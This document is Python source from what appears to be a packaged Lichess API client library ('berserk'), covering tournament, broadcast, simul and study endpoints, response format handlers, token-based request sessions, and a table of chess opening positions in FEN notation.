return self._r.get(path, params=params, fmt=fmt,
converter=models.Game.convert)
def swiss_by_team(self, teamId, maxT=None, as_pgn=False):
"""Get swiss tournaments created for a team
:param string teamId: Id of the team
:param int maxT: how many tournaments to download
:param bool as_pgn: whether to return pgn instead of Json
:return: tournaments
:rtype: list
"""
path = f'api/team/{teamId}/swiss'
params = {
'max': maxT,
}
fmt = PGN if self._use_pgn(as_pgn) else NDJSON
return self._r.get(path, params=params, fmt=fmt,
converter=models.Game.convert)
def stream_results(self, id_, limit=None):
"""Stream the results of a tournament.
Results are the players of a tournament with their scores and
performance in rank order. Note that results for ongoing
tournaments can be inconsistent due to ranking changes.
:param str id_: tournament ID
:param int limit: maximum number of results to stream
:return: iterator over the stream of results
:rtype: iter
"""
path = f'api/tournament/{id_}/results'
params = {'nb': limit}
return self._r.get(path, params=params, stream=True)
def stream_by_creator(self, username):
"""Stream the tournaments created by a player.
:param str username: username of the player
:return: tournaments
:rtype: iter
"""
path = f'api/user/{username}/tournament/created'
return self._r.get(path, stream=True)
class Broadcasts(BaseClient):
"""Broadcast of one or more games."""
def create(self, name, description, sync_url=None, markdown=None,
credit=None, starts_at=None, official=None, throttle=None):
"""Create a new broadcast.
.. note::
``sync_url`` must be publicly accessible. If not provided, you
must periodically push new PGN to update the broadcast manually.
:param str name: name of the broadcast
:param str description: short description
:param str markdown: long description
:param str sync_url: URL by which Lichess can poll for updates
:param str credit: short text to give credit to the source provider
:param int starts_at: start time as millis
:param bool official: DO NOT USE
:param int throttle: DO NOT USE
:return: created tournament info
:rtype: dict
"""
path = 'broadcast/new'
payload = {
'name': name,
'description': description,
'syncUrl': sync_url,
'markdown': markdown,
'credit': credit,
'startsAt': starts_at,
'official': official,
'throttle': throttle,
}
return self._r.post(path, json=payload,
converter=models.Broadcast.convert)
def get(self, broadcast_id, slug='-'):
"""Get a broadcast by ID.
:param str broadcast_id: ID of a broadcast
:param str slug: slug for SEO
:return: broadcast information
:rtype: dict
"""
path = f'broadcast/{slug}/{broadcast_id}'
return self._r.get(path, converter=models.Broadcast.convert)
def update(self, broadcast_id, name, description, sync_url, markdown=None,
credit=None, starts_at=None, official=None, throttle=None,
slug='-'):
"""Update an existing broadcast by ID.
.. note::
Provide all fields. Values in missing fields will be erased.
:param str broadcast_id: ID of a broadcast
:param str name: name of the broadcast
:param str description: short description
:param str sync_url: URL by which Lichess can poll for updates
:param str markdown: long description
:param str credit: short text to give credit to the source provider
:param int starts_at: start time as millis
:param bool official: DO NOT USE
:param int throttle: DO NOT USE
:param str slug: slug for SEO
:return: updated broadcast information
:rtype: dict
"""
path = f'broadcast/{slug}/{broadcast_id}'
payload = {
'name': name,
'description': description,
'syncUrl': sync_url,
'markdown': markdown,
'credit': credit,
'startsAt': starts_at,
'official': official,
}
return self._r.post(path, json=payload,
converter=models.Broadcast.convert)
def push_pgn_update(self, broadcast_id, pgn_games, slug='-'):
"""Manually update an existing broadcast by ID.
:param str broadcast_id: ID of a broadcast
:param list pgn_games: one or more games in PGN format
:return: success
:rtype: bool
"""
path = f'broadcast/{slug}/{broadcast_id}/push'
games = '\n\n'.join(g.strip() for g in pgn_games)
return self._r.post(path, data=games)['ok']
class Simuls(BaseClient):
"""Simultaneous exhibitions - one vs many."""
def get(self):
"""Get recently finished, ongoing, and upcoming simuls.
:return: current simuls
:rtype: list
"""
path = 'api/simul'
return self._r.get(path)
class Studies(BaseClient):
"""Study chess the Lichess way."""
def export_chapter(self, study_id, chapter_id):
"""Export one chapter of a study.
:return: chapter
:rtype: PGN
"""
path = f'/study/{study_id}/{chapter_id}.pgn'
return self._r.get(path, fmt=PGN)
def export(self, study_id):
"""Export all chapters of a study.
:return: all chapters as PGN
:rtype: list
"""
path = f'/study/{study_id}.pgn'
return self._r.get(path, fmt=PGN, stream=True) | zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/berserk/clients.py | clients.py |
import json
import ndjson
from . import utils
class FormatHandler:
"""Provide request headers and parse responses for a particular format.
Instances of this class should override the :meth:`parse_stream` and
:meth:`parse` methods to support handling both streaming and non-streaming
responses.
:param str mime_type: the MIME type for the format
"""
def __init__(self, mime_type):
self.mime_type = mime_type
self.headers = {'Accept': mime_type}
def handle(self, response, is_stream, converter=utils.noop):
"""Handle the response by returning the data.
:param response: raw response
:type response: :class:`requests.Response`
:param bool is_stream: ``True`` if the response is a stream
:param func converter: function to handle field conversions
:return: either all response data or an iterator of response data
"""
if is_stream:
return map(converter, iter(self.parse_stream(response)))
else:
return converter(self.parse(response))
def parse(self, response):
"""Parse all data from a response.
:param response: raw response
:type response: :class:`requests.Response`
:return: response data
"""
return response
def parse_stream(self, response):
"""Yield the parsed data from a stream response.
:param response: raw response
:type response: :class:`requests.Response`
:return: iterator over the response data
"""
yield response
class JsonHandler(FormatHandler):
"""Handle JSON data.
:param str mime_type: the MIME type for the format
:param decoder: the decoder to use for the JSON format
:type decoder: :class:`json.JSONDecoder`
"""
def __init__(self, mime_type, decoder=json.JSONDecoder):
super().__init__(mime_type=mime_type)
self.decoder = decoder
def parse(self, response):
"""Parse all JSON data from a response.
:param response: raw response
:type response: :class:`requests.Response`
:return: response data
:rtype: JSON
"""
return response.json(cls=self.decoder)
def parse_stream(self, response):
"""Yield the parsed data from a stream response.
:param response: raw response
:type response: :class:`requests.Response`
:return: iterator over multiple JSON objects
"""
for line in response.iter_lines():
if line:
decoded_line = line.decode('utf-8')
yield json.loads(decoded_line)
class PgnHandler(FormatHandler):
"""Handle PGN data."""
def __init__(self):
super().__init__(mime_type='application/x-chess-pgn')
def handle(self, *args, **kwargs):
kwargs['converter'] = utils.noop # disable conversions
return super().handle(*args, **kwargs)
def parse(self, response):
"""Parse all text data from a response.
:param response: raw response
:type response: :class:`requests.Response`
:return: response text
:rtype: str
"""
return response.text
def parse_stream(self, response):
"""Yield the parsed PGN games from a stream response.
:param response: raw response
:type response: :class:`requests.Response`
:return: iterator over multiple PGN texts
"""
lines = []
last_line = True
for line in response.iter_lines():
decoded_line = line.decode('utf-8')
if last_line or decoded_line:
lines.append(decoded_line)
else:
yield '\n'.join(lines).strip()
lines = []
last_line = decoded_line
if lines:
yield '\n'.join(lines).strip()
class TextHandler(FormatHandler):
def __init__(self):
super().__init__(mime_type='text/plain')
def parse(self, response):
return response.text
def parse_stream(self, response):
yield from response.iter_lines()
#: Basic text
TEXT = TextHandler()
#: Handles vanilla JSON
JSON = JsonHandler(mime_type='application/json')
#: Handles oddball LiChess JSON (normal JSON, crazy MIME type)
LIJSON = JsonHandler(mime_type='application/vnd.lichess.v3+json')
#: Handles newline-delimited JSON
NDJSON = JsonHandler(mime_type='application/x-ndjson', decoder=ndjson.Decoder)
#: Handles PGN
PGN = PgnHandler() | zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/berserk/formats.py | formats.py |
import logging
import urllib
import requests
from . import utils
from . import exceptions
LOG = logging.getLogger(__name__)
class Requestor:
"""Encapsulates the logic for making a request.
:param session: the authenticated session object
:type session: :class:`requests.Session`
:param str base_url: the base URL for requests
:param fmt: default format handler to use
:type fmt: :class:`~berserk.formats.FormatHandler`
"""
def __init__(self, session, base_url, default_fmt):
self.session = session
self.base_url = base_url
self.default_fmt = default_fmt
def request(self, method, path, *args, fmt=None, converter=utils.noop,
**kwargs):
"""Make a request for a resource in a paticular format.
:param str method: HTTP verb
:param str path: the URL suffix
:param fmt: the format handler
:type fmt: :class:`~berserk.formats.FormatHandler`
:param func converter: function to handle field conversions
:return: response
:raises berserk.exceptions.ResponseError: if the status is >=400
"""
fmt = fmt or self.default_fmt
kwargs['headers'] = fmt.headers
url = urllib.parse.urljoin(self.base_url, path)
is_stream = kwargs.get('stream')
LOG.debug('%s %s %s params=%s data=%s json=%s',
'stream' if is_stream else 'request', method, url,
kwargs.get('params'), kwargs.get('data'), kwargs.get('json'))
try:
response = self.session.request(method, url, *args, **kwargs)
except requests.RequestException as e:
raise exceptions.ApiError(e)
if not response.ok:
raise exceptions.ResponseError(response)
return fmt.handle(response, is_stream=is_stream, converter=converter)
def get(self, *args, **kwargs):
"""Convenience method to make a GET request."""
return self.request('GET', *args, **kwargs)
def post(self, *args, **kwargs):
"""Convenience method to make a POST request."""
return self.request('POST', *args, **kwargs)
class TokenSession(requests.Session):
"""Session capable of personal API token authentication.
:param str token: personal API token
"""
def __init__(self, token):
super().__init__()
self.token = token
self.headers = {'Authorization': f'Bearer {token}'} | zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/berserk/session.py | session.py |
__all__ = ['PerfType', 'Variant', 'Color', 'Room', 'Mode', 'Position']
class GameType:
ANTICHESS = 'antichess'
ATOMIC = 'atomic'
CHESS960 = 'chess960'
CRAZYHOUSE = 'crazyhouse'
HORDE = 'horde'
KING_OF_THE_HILL = 'kingOfTheHill'
RACING_KINGS = 'racingKings'
THREE_CHECK = 'threeCheck'
class PerfType(GameType):
BULLET = 'bullet'
BLITZ = 'blitz'
RAPID = 'rapid'
CLASSICAL = 'classical'
ULTRA_BULLET = 'ultraBullet'
class Variant(GameType):
STANDARD = 'standard'
class Color:
WHITE = 'white'
BLACK = 'black'
class Room:
PLAYER = 'player'
SPECTATOR = 'spectator'
class Mode:
CASUAL = 'casual'
RATED = 'rated'
class Position:
ALEKHINES_DEFENCE = 'rnbqkb1r/pppppppp/5n2/8/4P3/8/PPPP1PPP/RNBQKBNR w KQkq - 2 2' # noqa: E501
ALEKHINES_DEFENCE__MODERN_VARIATION = 'rnbqkb1r/ppp1pppp/3p4/3nP3/3P4/5N2/PPP2PPP/RNBQKB1R b KQkq - 1 4' # noqa: E501
BENKO_GAMBIT = 'rnbqkb1r/p2ppppp/5n2/1ppP4/2P5/8/PP2PPPP/RNBQKBNR w KQkq b6 1 4' # noqa: E501
BENONI_DEFENCE__CZECH_BENONI = 'rnbqkb1r/pp1p1ppp/5n2/2pPp3/2P5/8/PP2PPPP/RNBQKBNR w KQkq - 0 4' # noqa: E501
BENONI_DEFENCE__MODERN_BENONI = 'rnbqkb1r/pp1p1ppp/4pn2/2pP4/2P5/8/PP2PPPP/RNBQKBNR w KQkq - 0 4' # noqa: E501
BISHOPS_OPENING = 'rnbqkbnr/pppp1ppp/8/4p3/2B1P3/8/PPPP1PPP/RNBQK1NR b KQkq - 2 2' # noqa: E501
BLACKMAR_DIEMER_GAMBIT = 'rnbqkbnr/ppp1pppp/8/3p4/3PP3/8/PPP2PPP/RNBQKBNR b KQkq e3 1 2' # noqa: E501
BOGO_INDIAN_DEFENCE = 'rnbqk2r/pppp1ppp/4pn2/8/1bPP4/5N2/PP2PPPP/RNBQKB1R w KQkq - 3 4' # noqa: E501
BONGCLOUD_ATTACK = 'rnbqkbnr/pppp1ppp/8/4p3/4P3/8/PPPPKPPP/RNBQ1BNR b kq - 0 2' # noqa: E501
BUDAPEST_DEFENCE = 'rnbqkb1r/pppp1ppp/5n2/4p3/2PP4/8/PP2PPPP/RNBQKBNR w KQkq - 0 3' # noqa: E501
CARO_KANN_DEFENCE = 'rnbqkbnr/pp1ppppp/2p5/8/4P3/8/PPPP1PPP/RNBQKBNR w KQkq - 1 2' # noqa: E501
CARO_KANN_DEFENCE__ADVANCE_VARIATION = 'rnbqkbnr/pp2pppp/2p5/3pP3/3P4/8/PPP2PPP/RNBQKBNR b KQkq - 1 3' # noqa: E501
CARO_KANN_DEFENCE__CLASSICAL_VARIATION = 'rn1qkbnr/pp2pppp/2p5/5b2/3PN3/8/PPP2PPP/R1BQKBNR w KQkq - 2 5' # noqa: E501
CARO_KANN_DEFENCE__EXCHANGE_VARIATION = 'rnbqkbnr/pp2pppp/2p5/3P4/3P4/8/PPP2PPP/RNBQKBNR b KQkq - 1 3' # noqa: E501
CARO_KANN_DEFENCE__PANOV_BOTVINNIK_ATTACK = 'rnbqkb1r/pp3ppp/4pn2/3p4/2PP4/2N5/PP3PPP/R1BQKBNR w KQkq - 1 6' # noqa: E501
CARO_KANN_DEFENCE__STEINITZ_VARIATION = 'rnbqkb1r/pp3ppp/4pn2/3p4/2PP4/2N5/PP3PPP/R1BQKBNR w KQkq - 1 6' # noqa: E501
CATALAN_OPENING = 'rnbqkb1r/pppp1ppp/4pn2/8/2PP4/6P1/PP2PP1P/RNBQKBNR b KQkq - 1 3' # noqa: E501
CATALAN_OPENING__CLOSED_VARIATION = 'rnbqk2r/ppp1bppp/4pn2/3p4/2PP4/5NP1/PP2PPBP/RNBQK2R b KQkq - 4 5' # noqa: E501
CLOSED_GAME = 'rnbqkbnr/ppp1pppp/8/3p4/3P4/8/PPP1PPPP/RNBQKBNR w KQkq - 0 2' # noqa: E501
DANISH_GAMBIT = 'rnbqkbnr/pppp1ppp/8/8/3pP3/2P5/PP3PPP/RNBQKBNR b KQkq - 1 3' # noqa: E501
DUTCH_DEFENCE = 'rnbqkbnr/ppppp1pp/8/5p2/3P4/8/PPP1PPPP/RNBQKBNR w KQkq f6 1 2' # noqa: E501
DUTCH_DEFENCE__LENINGRAD_VARIATION = 'rnbqk2r/ppppp1bp/5np1/5p2/2PP4/5NP1/PP2PPBP/RNBQK2R b KQkq - 4 5' # noqa: E501
DUTCH_DEFENCE__STAUNTON_GAMBIT = 'rnbqkb1r/ppppp1pp/5n2/6B1/3Pp3/2N5/PPP2PPP/R2QKBNR b KQkq - 4 4' # noqa: E501
DUTCH_DEFENCE__STONEWALL_VARIATION = 'rnbq1rk1/ppp1b1pp/4pn2/3p1p2/2PP4/5NP1/PP2PPBP/RNBQ1RK1 w - d6 1 7' # noqa: E501
ENGLISH_OPENING = 'rnbqkbnr/pppppppp/8/8/2P5/8/PP1PPPPP/RNBQKBNR b KQkq c3 1 1' # noqa: E501
ENGLISH_OPENING__CLOSED_SYSTEM = 'r1bqk1nr/ppp2pbp/2np2p1/4p3/2P5/2NP2P1/PP2PPBP/R1BQK1NR w KQkq - 0 6' # noqa: E501
ENGLISH_OPENING__REVERSED_SICILIAN = 'rnbqkbnr/pppp1ppp/8/4p3/2P5/8/PP1PPPPP/RNBQKBNR w KQkq e6 1 2' # noqa: E501
ENGLISH_OPENING__SYMMETRICAL_VARIATION = 'rnbqkbnr/pp1ppppp/8/2p5/2P5/8/PP1PPPPP/RNBQKBNR w KQkq c6 1 2' # noqa: E501
FOUR_KNIGHTS_GAME = 'r1bqkb1r/pppp1ppp/2n2n2/4p3/4P3/2N2N2/PPPP1PPP/R1BQKB1R w KQkq - 5 4' # noqa: E501
FOUR_KNIGHTS_GAME__SCOTCH_VARIATION = 'r1bqkb1r/pppp1ppp/2n2n2/4p3/3PP3/2N2N2/PPP2PPP/R1BQKB1R b KQkq d3 1 4' # noqa: E501
FOUR_KNIGHTS_GAME__SPANISH_VARIATION = 'r1bqkb1r/pppp1ppp/2n2n2/1B2p3/4P3/2N2N2/PPPP1PPP/R1BQK2R b KQkq - 0 4' # noqa: E501
FRANKENSTEIN_DRACULA_VARIATION = 'rnbqkb1r/pppp1ppp/8/4p3/2B1n3/2N5/PPPP1PPP/R1BQK1NR w KQkq - 0 4' # noqa: E501
FRENCH_DEFENCE = 'rnbqkbnr/pppp1ppp/4p3/8/4P3/8/PPPP1PPP/RNBQKBNR w KQkq - 1 2' # noqa: E501
FRENCH_DEFENCE__ADVANCE_VARIATION = 'rnbqkbnr/ppp2ppp/4p3/3pP3/3P4/8/PPP2PPP/RNBQKBNR b KQkq - 1 3' # noqa: E501
FRENCH_DEFENCE__BURN_VARIATION = 'rnbqkb1r/ppp2ppp/4pn2/3p2B1/3PP3/2N5/PPP2PPP/R2QKBNR b KQkq - 1 4' # noqa: E501
FRENCH_DEFENCE__CLASSICAL_VARIATION = 'rnbqkb1r/ppp2ppp/4pn2/3p4/3PP3/2N5/PPP2PPP/R1BQKBNR w KQkq - 3 4' # noqa: E501
FRENCH_DEFENCE__EXCHANGE_VARIATION = 'rnbqkbnr/ppp2ppp/4p3/3P4/3P4/8/PPP2PPP/RNBQKBNR b KQkq - 1 3' # noqa: E501
FRENCH_DEFENCE__RUBINSTEIN_VARIATION = 'rnbqkbnr/ppp2ppp/4p3/8/3Pp3/2N5/PPP2PPP/R1BQKBNR w KQkq - 1 4' # noqa: E501
FRENCH_DEFENCE__TARRASCH_VARIATION = 'rnbqkbnr/ppp2ppp/4p3/3p4/3PP3/8/PPPN1PPP/R1BQKBNR b KQkq - 2 3' # noqa: E501
FRENCH_DEFENCE__WINAWER_VARIATION = 'rnbqk1nr/ppp2ppp/4p3/3p4/1b1PP3/2N5/PPP2PPP/R1BQKBNR w KQkq - 3 4' # noqa: E501
GIUOCO_PIANO = 'r1bqk1nr/pppp1ppp/2n5/2b1p3/2B1P3/5N2/PPPP1PPP/RNBQK2R w KQkq - 5 4' # noqa: E501
GRUNFELD_DEFENCE = 'rnbqkb1r/ppp1pp1p/5np1/3p4/2PP4/2N5/PP2PPPP/R1BQKBNR w KQkq d6 1 4' # noqa: E501
GRUNFELD_DEFENCE__BRINCKMANN_ATTACK = 'rnbqkb1r/ppp1pp1p/5np1/3p4/2PP1B2/2N5/PP2PPPP/R2QKBNR b KQkq - 2 4' # noqa: E501
GRUNFELD_DEFENCE__EXCHANGE_VARIATION = 'rnbqkb1r/ppp1pp1p/6p1/3n4/3P4/2N5/PP2PPPP/R1BQKBNR w KQkq - 1 5' # noqa: E501
GRUNFELD_DEFENCE__RUSSIAN_VARIATION = 'rnbqkb1r/ppp1pp1p/5np1/3p4/2PP4/1QN5/PP2PPPP/R1B1KBNR b KQkq - 0 4' # noqa: E501
GRUNFELD_DEFENCE__TAIMANOV_VARIATION = 'rnbqk2r/ppp1ppbp/5np1/3p2B1/2PP4/2N2N2/PP2PPPP/R2QKB1R b KQkq - 0 5' # noqa: E501
HALLOWEEN_GAMBIT = 'r1bqkb1r/pppp1ppp/2n2n2/4N3/4P3/2N5/PPPP1PPP/R1BQKB1R b KQkq - 1 4' # noqa: E501
HUNGARIAN_OPENING = 'rnbqkbnr/pppppppp/8/8/8/6P1/PPPPPP1P/RNBQKBNR b KQkq - 1 1' # noqa: E501
ITALIAN_GAME = 'r1bqkbnr/pppp1ppp/2n5/4p3/2B1P3/5N2/PPPP1PPP/RNBQK2R b KQkq - 4 3' # noqa: E501
ITALIAN_GAME__EVANS_GAMBIT = 'r1bqk1nr/pppp1ppp/2n5/2b1p3/1PB1P3/5N2/P1PP1PPP/RNBQK2R b KQkq b3 1 4' # noqa: E501
ITALIAN_GAME__HUNGARIAN_DEFENCE = 'r1bqk1nr/ppppbppp/2n5/4p3/2B1P3/5N2/PPPP1PPP/RNBQK2R w KQkq - 5 4' # noqa: E501
ITALIAN_GAME__TWO_KNIGHTS_DEFENCE = 'r1bqkb1r/pppp1ppp/2n2n2/4p3/2B1P3/5N2/PPPP1PPP/RNBQK2R w KQkq - 5 4' # noqa: E501
KINGS_GAMBIT = 'rnbqkbnr/pppp1ppp/8/4p3/4PP2/8/PPPP2PP/RNBQKBNR b KQkq f3 1 2' # noqa: E501
KINGS_GAMBIT_ACCEPTED = 'rnbqkbnr/pppp1ppp/8/8/4Pp2/8/PPPP2PP/RNBQKBNR w KQkq - 1 3' # noqa: E501
KINGS_GAMBIT_ACCEPTED__BISHOPS_GAMBIT = 'rnbqkbnr/pppp1ppp/8/8/2B1Pp2/8/PPPP2PP/RNBQK1NR b KQkq - 2 3' # noqa: E501
KINGS_GAMBIT_ACCEPTED__CLASSICAL_VARIATION = 'rnbqkbnr/pppp1p1p/8/6p1/4Pp2/5N2/PPPP2PP/RNBQKB1R w KQkq - 0 4' # noqa: E501
KINGS_GAMBIT_ACCEPTED__MODERN_DEFENCE = 'rnbqkbnr/ppp2ppp/8/3p4/4Pp2/5N2/PPPP2PP/RNBQKB1R w KQkq d6 1 4' # noqa: E501
KINGS_GAMBIT_DECLINED__CLASSICAL_VARIATION = 'rnbqk1nr/pppp1ppp/8/2b1p3/4PP2/8/PPPP2PP/RNBQKBNR w KQkq - 2 3' # noqa: E501
KINGS_GAMBIT_DECLINED__FALKBEER_COUNTERGAMBIT = 'rnbqkbnr/ppp2ppp/8/3pp3/4PP2/8/PPPP2PP/RNBQKBNR w KQkq d6 1 3' # noqa: E501
KINGS_INDIAN_ATTACK = 'rnbqkbnr/ppp1pppp/8/3p4/8/5NP1/PPPPPP1P/RNBQKB1R b KQkq - 1 2' # noqa: E501
KINGS_INDIAN_DEFENCE = 'rnbqkb1r/pppppp1p/5np1/8/2PP4/8/PP2PPPP/RNBQKBNR w KQkq - 1 3' # noqa: E501
KINGS_INDIAN_DEFENCE__4E4 = 'rnbqk2r/ppp1ppbp/3p1np1/8/2PPP3/2N5/PP3PPP/R1BQKBNR w KQkq - 1 5' # noqa: E501
KINGS_INDIAN_DEFENCE__AVERBAKH_VARIATION = 'rnbq1rk1/ppp1ppbp/3p1np1/6B1/2PPP3/2N5/PP2BPPP/R2QK1NR b KQ - 4 6' # noqa: E501
KINGS_INDIAN_DEFENCE__CLASSICAL_VARIATION = 'rnbq1rk1/ppp1ppbp/3p1np1/8/2PPP3/2N2N2/PP2BPPP/R1BQK2R b KQ - 4 6' # noqa: E501
KINGS_INDIAN_DEFENCE__FIANCHETTO_VARIATION = 'rnbqk2r/ppp1ppbp/3p1np1/8/2PP4/2N2NP1/PP2PP1P/R1BQKB1R b KQkq - 1 5' # noqa: E501
KINGS_INDIAN_DEFENCE__FOUR_PAWNS_ATTACK = 'rnbqk2r/ppp1ppbp/3p1np1/8/2PPPP2/2N5/PP4PP/R1BQKBNR b KQkq f3 1 5' # noqa: E501
KINGS_INDIAN_DEFENCE__SAMISCH_VARIATION = 'rnbqk2r/ppp1ppbp/3p1np1/8/2PPP3/2N2P2/PP4PP/R1BQKBNR b KQkq - 1 5' # noqa: E501
KINGS_PAWN = 'rnbqkbnr/pppppppp/8/8/4P3/8/PPPP1PPP/RNBQKBNR b KQkq e3 1 1'
LONDON_SYSTEM = 'rnbqkb1r/ppp1pppp/5n2/3p4/3P1B2/5N2/PPP1PPPP/RN1QKB1R b KQkq - 4 3' # noqa: E501
MODERN_DEFENCE = 'rnbqkbnr/pppppp1p/6p1/8/4P3/8/PPPP1PPP/RNBQKBNR w KQkq - 0 2' # noqa: E501
MODERN_DEFENCE__ROBATSCH_DEFENCE = 'rnbqk1nr/ppppppbp/6p1/8/3PP3/2N5/PPP2PPP/R1BQKBNR b KQkq - 0 3' # noqa: E501
NIMZO_INDIAN_DEFENCE = 'rnbqk2r/pppp1ppp/4pn2/8/1bPP4/2N5/PP2PPPP/R1BQKBNR w KQkq - 3 4' # noqa: E501
NIMZO_INDIAN_DEFENCE__CLASSICAL_VARIATION = 'rnbqk2r/pppp1ppp/4pn2/8/1bPP4/2N5/PPQ1PPPP/R1B1KBNR b KQkq - 4 4' # noqa: E501
NIMZO_INDIAN_DEFENCE__FISCHER_VARIATION = 'rnbqk2r/p1pp1ppp/1p2pn2/8/1bPP4/2N1P3/PP3PPP/R1BQKBNR w KQkq - 0 5' # noqa: E501
NIMZO_INDIAN_DEFENCE__HUBNER_VARIATION = 'r1bqk2r/pp3ppp/2nppn2/2p5/2PP4/2PBPN2/P4PPP/R1BQK2R w KQkq - 0 8' # noqa: E501
NIMZO_INDIAN_DEFENCE__KASPAROV_VARIATION = 'rnbqk2r/pppp1ppp/4pn2/8/1bPP4/2N2N2/PP2PPPP/R1BQKB1R b KQkq - 0 4' # noqa: E501
NIMZO_INDIAN_DEFENCE__LENINGRAD_VARIATION = 'rnbqk2r/pppp1ppp/4pn2/6B1/1bPP4/2N5/PP2PPPP/R2QKBNR b KQkq - 0 4' # noqa: E501
NIMZO_INDIAN_DEFENCE__SAMISCH_VARIATION = 'rnbqk2r/pppp1ppp/4pn2/8/2PP4/P1P5/4PPPP/R1BQKBNR b KQkq - 0 5' # noqa: E501
NIMZO_LARSEN_ATTACK = 'rnbqkbnr/pppppppp/8/8/8/1P6/P1PPPPPP/RNBQKBNR b KQkq - 1 1' # noqa: E501
OLD_INDIAN_DEFENCE = 'rnbqkb1r/ppp1pppp/3p1n2/8/2PP4/8/PP2PPPP/RNBQKBNR w KQkq - 1 3' # noqa: E501
OPEN_GAME = 'rnbqkbnr/pppp1ppp/8/4p3/4P3/8/PPPP1PPP/RNBQKBNR w KQkq - 0 2'
PETROVS_DEFENCE = 'rnbqkb1r/pppp1ppp/5n2/4p3/4P3/5N2/PPPP1PPP/RNBQKB1R w KQkq - 3 3' # noqa: E501
PETROVS_DEFENCE__CLASSICAL_ATTACK = 'rnbqkb1r/ppp2ppp/3p4/8/3Pn3/5N2/PPP2PPP/RNBQKB1R b KQkq d3 1 5' # noqa: E501
PETROVS_DEFENCE__STEINITZ_ATTACK = 'rnbqkb1r/pppp1ppp/5n2/4p3/3PP3/5N2/PPP2PPP/RNBQKB1R b KQkq d3 1 3' # noqa: E501
PETROVS_DEFENCE__THREE_KNIGHTS_GAME = 'rnbqkb1r/pppp1ppp/5n2/4p3/4P3/2N2N2/PPPP1PPP/R1BQKB1R b KQkq - 4 3' # noqa: E501
PHILIDOR_DEFENCE = 'rnbqkbnr/ppp2ppp/3p4/4p3/4P3/5N2/PPPP1PPP/RNBQKB1R w KQkq - 1 3' # noqa: E501
PIRC_DEFENCE = 'rnbqkb1r/ppp1pppp/3p1n2/8/3PP3/8/PPP2PPP/RNBQKBNR w KQkq - 2 3' # noqa: E501
PIRC_DEFENCE__AUSTRIAN_ATTACK = 'rnbqkb1r/ppp1pp1p/3p1np1/8/3PPP2/2N5/PPP3PP/R1BQKBNR b KQkq f3 1 4' # noqa: E501
PIRC_DEFENCE__CLASSICAL_VARIATION = 'rnbqkb1r/ppp1pp1p/3p1np1/8/3PP3/2N2N2/PPP2PPP/R1BQKB1R b KQkq - 2 4' # noqa: E501
QUEENS_GAMBIT = 'rnbqkbnr/ppp1pppp/8/3p4/2PP4/8/PP2PPPP/RNBQKBNR b KQkq c3 1 2' # noqa: E501
QUEENS_GAMBIT_ACCEPTED = 'rnbqkbnr/ppp1pppp/8/8/2pP4/8/PP2PPPP/RNBQKBNR w KQkq - 1 3' # noqa: E501
QUEENS_GAMBIT_DECLINED__ALBIN_COUNTERGAMBIT = 'rnbqkbnr/ppp2ppp/8/3pp3/2PP4/8/PP2PPPP/RNBQKBNR w KQkq e6 1 3' # noqa: E501
QUEENS_GAMBIT_DECLINED__CHIGORIN_DEFENCE = 'r1bqkbnr/ppp1pppp/2n5/3p4/2PP4/8/PP2PPPP/RNBQKBNR w KQkq - 2 3' # noqa: E501
QUEENS_GAMBIT_DECLINED__SEMI_SLAV_DEFENCE = 'rnbqkb1r/pp3ppp/2p1pn2/3p4/2PP4/2N2N2/PP2PPPP/R1BQKB1R w KQkq - 1 5' # noqa: E501
QUEENS_GAMBIT_DECLINED__SEMI_TARRASCH_DEFENCE = 'rnbqkb1r/pp3ppp/4pn2/2pp4/2PP4/2N2N2/PP2PPPP/R1BQKB1R w KQkq c6 1 5' # noqa: E501
QUEENS_GAMBIT_DECLINED__SLAV_DEFENCE = 'rnbqkbnr/pp2pppp/2p5/3p4/2PP4/8/PP2PPPP/RNBQKBNR w KQkq - 0 3' # noqa: E501
QUEENS_GAMBIT_DECLINED__TARRASCH_DEFENCE = 'rnbqkbnr/pp3ppp/4p3/2pp4/2PP4/2N5/PP2PPPP/R1BQKBNR w KQkq - 0 4' # noqa: E501
QUEENS_INDIAN_DEFENCE = 'rnbqkb1r/p1pp1ppp/1p2pn2/8/2PP4/5N2/PP2PPPP/RNBQKB1R w KQkq - 1 4' # noqa: E501
QUEENS_PAWN = 'rnbqkbnr/pppppppp/8/8/3P4/8/PPP1PPPP/RNBQKBNR b KQkq d3 1 1' # noqa: E501
QUEENSS_PAWN_GAME__MODERN_DEFENCE = 'rnbqk1nr/ppp1ppbp/3p2p1/8/2PP4/2N5/PP2PPPP/R1BQKBNR w KQkq - 1 4' # noqa: E501
RICHTER_VERESOV_ATTACK = 'rnbqkb1r/ppp1pppp/5n2/3p2B1/3P4/2N5/PPP1PPPP/R2QKBNR b KQkq - 4 3' # noqa: E501
RUY_LOPEZ = 'r1bqkbnr/pppp1ppp/2n5/1B2p3/4P3/5N2/PPPP1PPP/RNBQK2R b KQkq - 4 3' # noqa: E501
RUY_LOPEZ__BERLIN_DEFENCE = 'r1bqkb1r/pppp1ppp/2n2n2/1B2p3/4P3/5N2/PPPP1PPP/RNBQK2R w KQkq - 5 4' # noqa: E501
RUY_LOPEZ__CLASSICAL_VARIATION = 'r1bqk1nr/pppp1ppp/2n5/1Bb1p3/4P3/5N2/PPPP1PPP/RNBQK2R w KQkq - 5 4' # noqa: E501
RUY_LOPEZ__CLOSED_VARIATION = 'r1bqk2r/2ppbppp/p1n2n2/1p2p3/4P3/1B3N2/PPPP1PPP/RNBQR1K1 b kq - 0 7' # noqa: E501
RUY_LOPEZ__EXCHANGE_VARIATION = 'r1bqkbnr/1ppp1ppp/p1B5/4p3/4P3/5N2/PPPP1PPP/RNBQK2R b KQkq - 1 4' # noqa: E501
RUY_LOPEZ__MARSHALL_ATTACK = 'r1bq1rk1/2p1bppp/p1n2n2/1p1pp3/4P3/1BP2N2/PP1P1PPP/RNBQR1K1 w - - 0 9' # noqa: E501
RUY_LOPEZ__SCHLIEMANN_DEFENCE = 'r1bqkbnr/pppp2pp/2n5/1B2pp2/4P3/5N2/PPPP1PPP/RNBQK2R w KQkq f6 1 4' # noqa: E501
RETI_OPENING = 'rnbqkbnr/ppp1pppp/8/3p4/2P5/5N2/PP1PPPPP/RNBQKB1R b KQkq c3 1 2' # noqa: E501
SCANDINAVIAN_DEFENCE = 'rnbqkbnr/ppp1pppp/8/3p4/4P3/8/PPPP1PPP/RNBQKBNR w KQkq d6 1 2' # noqa: E501
